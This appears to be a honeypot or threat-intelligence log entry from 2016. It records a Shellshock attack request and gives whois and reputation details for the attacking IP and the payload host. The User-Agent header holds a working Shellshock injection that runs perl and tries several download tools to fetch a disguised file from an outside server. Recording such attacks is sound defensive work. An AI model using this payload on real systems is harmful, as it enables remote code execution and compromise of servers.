Thursday, 21 January 2016

213.136.72.84 . Shellshock perl via 204.232.209.188

BEGIN OF HTTP DATA:
2016-01-20 09:58:59
Source IP: 213.136.72.84
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download  http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png  ");'
Host: 195.169.125.87
Connection: Close


 END OF DATA

213.136.72[.]84

    Whois Data (TeamCymru)
  • AS : 51167
  • IP : 213.136.72.84
  • BGP Prefix : 213.136.72.0/23
  • CC : DE
  • Registry : ripencc
  • Allocated : 2000-02-28
  • AS Name: CONTABO Contabo GmbH,DE
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/213.136.72.84
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/213.136.72.84

204.232.209[.]188

    Whois Data (TeamCymru)
  • AS : 33070
  • IP : 204.232.209.188
  • BGP Prefix : 204.232.192.0/19
  • CC : US
  • Registry : arin
  • Allocated : 2009-06-24
  • AS Name: RMH-14 - Rackspace Hosting,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois